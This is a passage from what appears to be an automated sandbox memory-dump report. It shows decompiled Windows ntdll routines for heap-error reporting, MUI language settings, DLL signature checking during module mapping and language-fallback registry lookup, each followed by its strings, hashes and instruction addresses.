                                                              					E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				_push(_t105);
                                                              				E04B9B150("Error code: %d - %s\n",  *0x4c85898);
                                                              				_t113 =  *0x4c858a4; // 0x0
                                                              				if(_t113 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E04B9B150();
                                                              					} else {
                                                              						E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E04B9B150("Parameter1: %p\n",  *0x4c858a4);
                                                              				}
                                                              				_t115 =  *0x4c858a8; // 0x0
                                                              				if(_t115 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E04B9B150();
                                                              					} else {
                                                              						E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E04B9B150("Parameter2: %p\n",  *0x4c858a8);
                                                              				}
                                                              				_t117 =  *0x4c858ac; // 0x0
                                                              				if(_t117 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E04B9B150();
                                                              					} else {
                                                              						E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E04B9B150("Parameter3: %p\n",  *0x4c858ac);
                                                              				}
                                                              				_t119 =  *0x4c858b0; // 0x0
                                                              				if(_t119 != 0) {
                                                              					L41:
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E04B9B150();
                                                              					} else {
                                                              						E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					_push( *0x4c858b4);
                                                              					E04B9B150("Last known valid blocks: before - %p, after - %p\n",  *0x4c858b0);
                                                              				} else {
                                                              					_t120 =  *0x4c858b4; // 0x0
                                                              					if(_t120 != 0) {
                                                              						goto L41;
                                                              					}
                                                              				}
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E04B9B150();
                                                              				} else {
                                                              					E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				return E04B9B150("Stack trace available at %p\n", 0x4c858c0);
                                                              			}












                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                              • API String ID: 0-2897834094
                                                              • Opcode ID: cc1ab9a2dd89cd625c728b711cb87cf15869fb63f57e30db809a6331577542c6
                                                              • Instruction ID: fbb0be522f16c4360e3ed87f2ee7ffdc74c7d3d12ba237a63f5b1fbb440a97a2
                                                              • Opcode Fuzzy Hash: cc1ab9a2dd89cd625c728b711cb87cf15869fb63f57e30db809a6331577542c6
                                                              • Instruction Fuzzy Hash: F761A637A65155EFE611AB45E448F2873E5FB05A3070D44BEF8099B231DAA5FC90CE0E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E04BA3D34(signed int* __ecx) {
                                                              				signed int* _v8;
                                                              				char _v12;
                                                              				signed int* _v16;
                                                              				signed int* _v20;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				signed int _v44;
                                                              				signed int* _v48;
                                                              				signed int* _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				char _v68;
                                                              				signed int _t140;
                                                              				signed int _t161;
                                                              				signed int* _t236;
                                                              				signed int* _t242;
                                                              				signed int* _t243;
                                                              				signed int* _t244;
                                                              				signed int* _t245;
                                                              				signed int _t255;
                                                              				void* _t257;
                                                              				signed int _t260;
                                                              				void* _t262;
                                                              				signed int _t264;
                                                              				void* _t267;
                                                              				signed int _t275;
                                                              				signed int* _t276;
                                                              				short* _t277;
                                                              				signed int* _t278;
                                                              				signed int* _t279;
                                                              				signed int* _t280;
                                                              				short* _t281;
                                                              				signed int* _t282;
                                                              				short* _t283;
                                                              				signed int* _t284;
                                                              				void* _t285;
                                                              
                                                              				_v60 = _v60 | 0xffffffff;
                                                              				_t280 = 0;
                                                              				_t242 = __ecx;
                                                              				_v52 = __ecx;
                                                              				_v8 = 0;
                                                              				_v20 = 0;
                                                              				_v40 = 0;
                                                              				_v28 = 0;
                                                              				_v32 = 0;
                                                              				_v44 = 0;
                                                              				_v56 = 0;
                                                              				_t275 = 0;
                                                              				_v16 = 0;
                                                              				if(__ecx == 0) {
                                                              					_t280 = 0xc000000d;
                                                              					_t140 = 0;
                                                              					L50:
                                                              					 *_t242 =  *_t242 | 0x00000800;
                                                              					_t242[0x13] = _t140;
                                                              					_t242[0x16] = _v40;
                                                              					_t242[0x18] = _v28;
                                                              					_t242[0x14] = _v32;
                                                              					_t242[0x17] = _t275;
                                                              					_t242[0x15] = _v44;
                                                              					_t242[0x11] = _v56;
                                                              					_t242[0x12] = _v60;
                                                              					return _t280;
                                                              				}
                                                              				if(E04BA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                              					_v56 = 1;
                                                              					if(_v8 != 0) {
                                                              						L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                              					}
                                                              					_v8 = _t280;
                                                              				}
                                                              				if(E04BA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                              					_v60 =  *_v8;
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                              					_v8 = _t280;
                                                              				}
                                                              				if(E04BA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                              					L16:
                                                              					if(E04BA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                              						L28:
                                                              						if(E04BA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                              							L46:
                                                              							_t275 = _v16;
                                                              							L47:
                                                              							_t161 = 0;
                                                              							L48:
                                                              							if(_v8 != 0) {
                                                              								L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                              							}
                                                              							_t140 = _v20;
                                                              							if(_t140 != 0) {
                                                              								if(_t275 != 0) {
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                              									_t275 = 0;
                                                              									_v28 = 0;
                                                              									_t140 = _v20;
                                                              								}
                                                              							}
                                                              							goto L50;
                                                              						}
                                                              						_t167 = _v12;
                                                              						_t255 = _v12 + 4;
                                                              						_v44 = _t255;
                                                              						if(_t255 == 0) {
                                                              							_t276 = _t280;
                                                              							_v32 = _t280;
                                                              						} else {
                                                              							_t276 = L04BB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                              							_t167 = _v12;
                                                              							_v32 = _t276;
                                                              						}
                                                              						if(_t276 == 0) {
                                                              							_v44 = _t280;
                                                              							_t280 = 0xc0000017;
                                                              							goto L46;
                                                              						} else {
                                                              							E04BDF3E0(_t276, _v8, _t167);
                                                              							_v48 = _t276;
                                                              							_t277 = E04BE1370(_t276, 0x4b74e90);
                                                              							_pop(_t257);
                                                              							if(_t277 == 0) {
                                                              								L38:
                                                              								_t170 = _v48;
                                                              								if( *_v48 != 0) {
                                                              									E04BDBB40(0,  &_v68, _t170);
                                                              									if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              										_t280 =  &(_t280[0]);
                                                              									}
                                                              								}
                                                              								if(_t280 == 0) {
                                                              									_t280 = 0;
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                              									_v44 = 0;
                                                              									_v32 = 0;
                                                              								} else {
                                                              									_t280 = 0;
                                                              								}
                                                              								_t174 = _v8;
                                                              								if(_v8 != 0) {
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                              								}
                                                              								_v8 = _t280;
                                                              								goto L46;
                                                              							}
                                                              							_t243 = _v48;
                                                              							do {
                                                              								 *_t277 = 0;
                                                              								_t278 = _t277 + 2;
                                                              								E04BDBB40(_t257,  &_v68, _t243);
                                                              								if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              									_t280 =  &(_t280[0]);
                                                              								}
                                                              								_t243 = _t278;
                                                              								_t277 = E04BE1370(_t278, 0x4b74e90);
                                                              								_pop(_t257);
                                                              							} while (_t277 != 0);
                                                              							_v48 = _t243;
                                                              							_t242 = _v52;
                                                              							goto L38;
                                                              						}
                                                              					}
                                                              					_t191 = _v12;
                                                              					_t260 = _v12 + 4;
                                                              					_v28 = _t260;
                                                              					if(_t260 == 0) {
                                                              						_t275 = _t280;
                                                              						_v16 = _t280;
                                                              					} else {
                                                              						_t275 = L04BB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                              						_t191 = _v12;
                                                              						_v16 = _t275;
                                                              					}
                                                              					if(_t275 == 0) {
                                                              						_v28 = _t280;
                                                              						_t280 = 0xc0000017;
                                                              						goto L47;
                                                              					} else {
                                                              						E04BDF3E0(_t275, _v8, _t191);
                                                              						_t285 = _t285 + 0xc;
                                                              						_v48 = _t275;
                                                              						_t279 = _t280;
                                                              						_t281 = E04BE1370(_v16, 0x4b74e90);
                                                              						_pop(_t262);
                                                              						if(_t281 != 0) {
                                                              							_t244 = _v48;
                                                              							do {
                                                              								 *_t281 = 0;
                                                              								_t282 = _t281 + 2;
                                                              								E04BDBB40(_t262,  &_v68, _t244);
                                                              								if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              									_t279 =  &(_t279[0]);
                                                              								}
                                                              								_t244 = _t282;
                                                              								_t281 = E04BE1370(_t282, 0x4b74e90);
                                                              								_pop(_t262);
                                                              							} while (_t281 != 0);
                                                              							_v48 = _t244;
                                                              							_t242 = _v52;
                                                              						}
                                                              						_t201 = _v48;
                                                              						_t280 = 0;
                                                              						if( *_v48 != 0) {
                                                              							E04BDBB40(_t262,  &_v68, _t201);
                                                              							if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              								_t279 =  &(_t279[0]);
                                                              							}
                                                              						}
                                                              						if(_t279 == 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                              							_v28 = _t280;
                                                              							_v16 = _t280;
                                                              						}
                                                              						_t202 = _v8;
                                                              						if(_v8 != 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                              						}
                                                              						_v8 = _t280;
                                                              						goto L28;
                                                              					}
                                                              				}
                                                              				_t214 = _v12;
                                                              				_t264 = _v12 + 4;
                                                              				_v40 = _t264;
                                                              				if(_t264 == 0) {
                                                              					_v20 = _t280;
                                                              				} else {
                                                              					_t236 = L04BB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                              					_t280 = _t236;
                                                              					_v20 = _t236;
                                                              					_t214 = _v12;
                                                              				}
                                                              				if(_t280 == 0) {
                                                              					_t161 = 0;
                                                              					_t280 = 0xc0000017;
                                                              					_v40 = 0;
                                                              					goto L48;
                                                              				} else {
                                                              					E04BDF3E0(_t280, _v8, _t214);
                                                              					_t285 = _t285 + 0xc;
                                                              					_v48 = _t280;
                                                              					_t283 = E04BE1370(_t280, 0x4b74e90);
                                                              					_pop(_t267);
                                                              					if(_t283 != 0) {
                                                              						_t245 = _v48;
                                                              						do {
                                                              							 *_t283 = 0;
                                                              							_t284 = _t283 + 2;
                                                              							E04BDBB40(_t267,  &_v68, _t245);
                                                              							if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              								_t275 = _t275 + 1;
                                                              							}
                                                              							_t245 = _t284;
                                                              							_t283 = E04BE1370(_t284, 0x4b74e90);
                                                              							_pop(_t267);
                                                              						} while (_t283 != 0);
                                                              						_v48 = _t245;
                                                              						_t242 = _v52;
                                                              					}
                                                              					_t224 = _v48;
                                                              					_t280 = 0;
                                                              					if( *_v48 != 0) {
                                                              						E04BDBB40(_t267,  &_v68, _t224);
                                                              						if(L04BA43C0( &_v68,  &_v24) != 0) {
                                                              							_t275 = _t275 + 1;
                                                              						}
                                                              					}
                                                              					if(_t275 == 0) {
                                                              						L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                              						_v40 = _t280;
                                                              						_v20 = _t280;
                                                              					}
                                                              					_t225 = _v8;
                                                              					if(_v8 != 0) {
                                                              						L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                              					}
                                                              					_v8 = _t280;
                                                              					goto L16;
                                                              				}
                                                              			}










































                                                              0x04ba401b
                                                              0x04ba401e
                                                              0x00000000
                                                              0x04ba401e
                                                              0x04ba3fb6
                                                              0x04ba3eb1
                                                              0x04ba3eb4
                                                              0x04ba3eb7
                                                              0x04ba3ebc
                                                              0x04bf82a9
                                                              0x04bf82ab
                                                              0x04ba3ec2
                                                              0x04ba3ed3
                                                              0x04ba3ed5
                                                              0x04ba3ed8
                                                              0x04ba3ed8
                                                              0x04ba3edd
                                                              0x04bf82b3
                                                              0x04bf82b6
                                                              0x00000000
                                                              0x04ba3ee3
                                                              0x04ba3ee8
                                                              0x04ba3eed
                                                              0x04ba3ef0
                                                              0x04ba3ef3
                                                              0x04ba3f02
                                                              0x04ba3f05
                                                              0x04ba3f08
                                                              0x04bf82c0
                                                              0x04bf82c3
                                                              0x04bf82c5
                                                              0x04bf82c8
                                                              0x04bf82d0
                                                              0x04bf82e4
                                                              0x04bf82e6
                                                              0x04bf82e6
                                                              0x04bf82ed
                                                              0x04bf82f4
                                                              0x04bf82f7
                                                              0x04bf82f8
                                                              0x04bf82fc
                                                              0x04bf82ff
                                                              0x04bf82ff
                                                              0x04ba3f0e
                                                              0x04ba3f11
                                                              0x04ba3f16
                                                              0x04ba3f1d
                                                              0x04ba3f31
                                                              0x04bf8307
                                                              0x04bf8307
                                                              0x04ba3f31
                                                              0x04ba3f39
                                                              0x04ba3f48
                                                              0x04ba3f4d
                                                              0x04ba3f50
                                                              0x04ba3f50
                                                              0x04ba3f53
                                                              0x04ba3f58
                                                              0x04ba3f65
                                                              0x04ba3f65
                                                              0x04ba3f6a
                                                              0x00000000
                                                              0x04ba3f6a
                                                              0x04ba3edd
                                                              0x04ba3dda
                                                              0x04ba3ddd
                                                              0x04ba3de0
                                                              0x04ba3de5
                                                              0x04bf8245
                                                              0x04ba3deb
                                                              0x04ba3df7
                                                              0x04ba3dfc
                                                              0x04ba3dfe
                                                              0x04ba3e01
                                                              0x04ba3e01
                                                              0x04ba3e06
                                                              0x04bf824d
                                                              0x04bf824f
                                                              0x04bf8254
                                                              0x00000000
                                                              0x04ba3e0c
                                                              0x04ba3e11
                                                              0x04ba3e16
                                                              0x04ba3e19
                                                              0x04ba3e29
                                                              0x04ba3e2c
                                                              0x04ba3e2f
                                                              0x04bf825c
                                                              0x04bf825f
                                                              0x04bf8261
                                                              0x04bf8264
                                                              0x04bf826c
                                                              0x04bf8280
                                                              0x04bf8282
                                                              0x04bf8282
                                                              0x04bf8289
                                                              0x04bf8290
                                                              0x04bf8293
                                                              0x04bf8294
                                                              0x04bf8298
                                                              0x04bf829b
                                                              0x04bf829b
                                                              0x04ba3e35
                                                              0x04ba3e38
                                                              0x04ba3e3d
                                                              0x04ba3e44
                                                              0x04ba3e58
                                                              0x04bf82a3
                                                              0x04bf82a3
                                                              0x04ba3e58
                                                              0x04ba3e60
                                                              0x04ba3e6f
                                                              0x04ba3e74
                                                              0x04ba3e77
                                                              0x04ba3e77
                                                              0x04ba3e7a
                                                              0x04ba3e7f
                                                              0x04ba3e8c
                                                              0x04ba3e8c
                                                              0x04ba3e91
                                                              0x00000000
                                                              0x04ba3e91

                                                              Strings
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 04BA3E97
                                                              • Kernel-MUI-Language-SKU, xrefs: 04BA3F70
                                                              • Kernel-MUI-Number-Allowed, xrefs: 04BA3D8C
                                                              • Kernel-MUI-Language-Allowed, xrefs: 04BA3DC0
                                                              • WindowsExcludedProcs, xrefs: 04BA3D6F
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-258546922
                                                              • Opcode ID: b6e974348f3237e29c930f754fbac07f74ae443d4999a1e873fb63b06e673345
                                                              • Instruction ID: 87742354f8abfef8eefb8ee210a5cb8a9bc63cb0ad90a1fd58090092f3bde3e1
                                                              • Opcode Fuzzy Hash: b6e974348f3237e29c930f754fbac07f74ae443d4999a1e873fb63b06e673345
                                                              • Instruction Fuzzy Hash: 15F13C72D04619EFDB11DF98C980AEEB7B9FF48754F1500AAE905A7210E774BE04DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 98%
                                                              			E04BA7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				char _v24;
                                                              				signed int _t73;
                                                              				void* _t77;
                                                              				char* _t82;
                                                              				char* _t87;
                                                              				signed char* _t97;
                                                              				signed char _t102;
                                                              				intOrPtr _t107;
                                                              				signed char* _t108;
                                                              				intOrPtr _t112;
                                                              				intOrPtr _t124;
                                                              				intOrPtr _t125;
                                                              				intOrPtr _t126;
                                                              
                                                              				_t107 = __edx;
                                                              				_v12 = __ecx;
                                                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                              				_t124 = 0;
                                                              				_v20 = __edx;
                                                              				if(E04BACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                              					_t112 = _v8;
                                                              				} else {
                                                              					_t112 = 0;
                                                              					_v8 = 0;
                                                              				}
                                                              				if(_t112 != 0) {
                                                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                              						_t124 = 0xc000007b;
                                                              						goto L8;
                                                              					}
                                                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                              					 *(_t125 + 0x34) = _t73;
                                                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                              					_t124 = E04B9C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                              					if(_t124 < 0) {
                                                              						goto L8;
                                                              					} else {
                                                              						goto L3;
                                                              					}
                                                              				} else {
                                                              					L3:
                                                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                              						L8:
                                                              						return _t124;
                                                              					}
                                                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                              							goto L5;
                                                              						}
                                                              						_t102 =  *0x4c85780; // 0x0
                                                              						if((_t102 & 0x00000003) != 0) {
                                                              							E04C15510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                              							_t102 =  *0x4c85780; // 0x0
                                                              						}
                                                              						if((_t102 & 0x00000010) != 0) {
                                                              							asm("int3");
                                                              						}
                                                              						_t124 = 0xc0000428;
                                                              						goto L8;
                                                              					}
                                                              					L5:
                                                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                              						goto L8;
                                                              					}
                                                              					_t77 = _a4 - 0x40000003;
                                                              					if(_t77 == 0 || _t77 == 0x33) {
                                                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                              						if(E04BB7D50() != 0) {
                                                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              						} else {
                                                              							_t82 = 0x7ffe0384;
                                                              						}
                                                              						_t108 = 0x7ffe0385;
                                                              						if( *_t82 != 0) {
                                                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                              								if(E04BB7D50() == 0) {
                                                              									_t97 = 0x7ffe0385;
                                                              								} else {
                                                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              								}
                                                              								if(( *_t97 & 0x00000020) != 0) {
                                                              									E04C17016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                              								}
                                                              							}
                                                              						}
                                                              						if(_a4 != 0x40000003) {
                                                              							L14:
                                                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                              							if(E04BB7D50() != 0) {
                                                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              							} else {
                                                              								_t87 = 0x7ffe0384;
                                                              							}
                                                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                              								if(E04BB7D50() != 0) {
                                                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                              								}
                                                              								if(( *_t108 & 0x00000020) != 0) {
                                                              									E04C17016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                              								}
                                                              							}
                                                              							goto L8;
                                                              						} else {
                                                              							_v16 = _t125 + 0x24;
                                                              							_t124 = E04BCA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                              							if(_t124 < 0) {
                                                              								E04B9B1E1(_t124, 0x1490, 0, _v16);
                                                              								goto L8;
                                                              							}
                                                              							goto L14;
                                                              						}
                                                              					} else {
                                                              						goto L8;
                                                              					}
                                                              				}
                                                              			}

                                                              Strings
                                                              • LdrpCompleteMapModule, xrefs: 04BF9898
                                                              • minkernel\ntdll\ldrmap.c, xrefs: 04BF98A2
                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 04BF9891
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                              • API String ID: 0-1676968949
                                                              • Opcode ID: a43bca24654c13e2504c20a8b267b8533aa410f7a0433296fdcbdea95be0dbf7
                                                              • Instruction ID: 9e2de78b7ae8201febb1fe54af87fb95f3510887ca0b1e3c3d20128842abf46d
                                                              • Opcode Fuzzy Hash: a43bca24654c13e2504c20a8b267b8533aa410f7a0433296fdcbdea95be0dbf7
                                                              • Instruction Fuzzy Hash: 33510F71B087819BEB21CF68C844B6ABBE8EB41314F0449E9E9559B7E1DB70FD10CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E04B9E620(void* __ecx, short* __edx, short* _a4) {
                                                              				char _v16;
                                                              				char _v20;
                                                              				intOrPtr _v24;
                                                              				char* _v28;
                                                              				char _v32;
                                                              				char _v36;
                                                              				char _v44;
                                                              				signed int _v48;
                                                              				intOrPtr _v52;
                                                              				void* _v56;
                                                              				void* _v60;
                                                              				char _v64;
                                                              				void* _v68;
                                                              				void* _v76;
                                                              				void* _v84;
                                                              				signed int _t59;
                                                              				signed int _t74;
                                                              				signed short* _t75;
                                                              				signed int _t76;
                                                              				signed short* _t78;
                                                              				signed int _t83;
                                                              				short* _t93;
                                                              				signed short* _t94;
                                                              				short* _t96;
                                                              				void* _t97;
                                                              				signed int _t99;
                                                              				void* _t101;
                                                              				void* _t102;
                                                              
                                                              				_t80 = __ecx;
                                                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                              				_t96 = __edx;
                                                              				_v44 = __edx;
                                                              				_t78 = 0;
                                                              				_v56 = 0;
                                                              				if(__ecx == 0 || __edx == 0) {
                                                              					L28:
                                                              					_t97 = 0xc000000d;
                                                              				} else {
                                                              					_t93 = _a4;
                                                              					if(_t93 == 0) {
                                                              						goto L28;
                                                              					}
                                                              					_t78 = E04B9F358(__ecx, 0xac);
                                                              					if(_t78 == 0) {
                                                              						_t97 = 0xc0000017;
                                                              						L6:
                                                              						if(_v56 != 0) {
                                                              							_push(_v56);
                                                              							E04BD95D0();
                                                              						}
                                                              						if(_t78 != 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                              						}
                                                              						return _t97;
                                                              					}
                                                              					E04BDFA60(_t78, 0, 0x158);
                                                              					_v48 = _v48 & 0x00000000;
                                                              					_t102 = _t101 + 0xc;
                                                              					 *_t96 = 0;
                                                              					 *_t93 = 0;
                                                              					E04BDBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                              					_v36 = 0x18;
                                                              					_v28 =  &_v44;
                                                              					_v64 = 0;
                                                              					_push( &_v36);
                                                              					_push(0x20019);
                                                              					_v32 = 0;
                                                              					_push( &_v64);
                                                              					_v24 = 0x40;
                                                              					_v20 = 0;
                                                              					_v16 = 0;
                                                              					_t97 = E04BD9600();
                                                              					if(_t97 < 0) {
                                                              						goto L6;
                                                              					}
                                                              					E04BDBB40(0,  &_v36, L"InstallLanguageFallback");
                                                              					_push(0);
                                                              					_v48 = 4;
                                                              					_t97 = L04B9F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                              					if(_t97 >= 0) {
                                                              						if(_v52 != 1) {
                                                              							L17:
                                                              							_t97 = 0xc0000001;
                                                              							goto L6;
                                                              						}
                                                              						_t59 =  *_t78 & 0x0000ffff;
                                                              						_t94 = _t78;
                                                              						_t83 = _t59;
                                                              						if(_t59 == 0) {
                                                              							L19:
                                                              							if(_t83 == 0) {
                                                              								L23:
                                                              								E04BDBB40(_t83, _t102 + 0x24, _t78);
                                                              								if(L04BA43C0( &_v48,  &_v64) == 0) {
                                                              									goto L17;
                                                              								}
                                                              								_t84 = _v48;
                                                              								 *_v48 = _v56;
                                                              								if( *_t94 != 0) {
                                                              									E04BDBB40(_t84, _t102 + 0x24, _t94);
                                                              									if(L04BA43C0( &_v48,  &_v64) != 0) {
                                                              										 *_a4 = _v56;
                                                              									} else {
                                                              										_t97 = 0xc0000001;
                                                              										 *_v48 = 0;
                                                              									}
                                                              								}
                                                              								goto L6;
                                                              							}
                                                              							_t83 = _t83 & 0x0000ffff;
                                                              							while(_t83 == 0x20) {
                                                              								_t94 =  &(_t94[1]);
                                                              								_t74 =  *_t94 & 0x0000ffff;
                                                              								_t83 = _t74;
                                                              								if(_t74 != 0) {
                                                              									continue;
                                                              								}
                                                              								goto L23;
                                                              							}
                                                              							goto L23;
                                                              						} else {
                                                              							goto L14;
                                                              						}
                                                              						while(1) {
                                                              							L14:
                                                              							_t27 =  &(_t94[1]); // 0x2
                                                              							_t75 = _t27;
                                                              							if(_t83 == 0x2c) {
                                                              								break;
                                                              							}
                                                              							_t94 = _t75;
                                                              							_t76 =  *_t94 & 0x0000ffff;
                                                              							_t83 = _t76;
                                                              							if(_t76 != 0) {
                                                              								continue;
                                                              							}
                                                              							goto L23;
                                                              						}
                                                              						 *_t94 = 0;
                                                              						_t94 = _t75;
                                                              						_t83 =  *_t75 & 0x0000ffff;
                                                              						goto L19;
                                                              					}
                                                              				}
                                                              			}































                                                              0x04b9e620
                                                              0x04b9e628
                                                              0x04b9e62f
                                                              0x04b9e631
                                                              0x04b9e635
                                                              0x04b9e637
                                                              0x04b9e63e
                                                              0x04bf5503
                                                              0x04bf5503
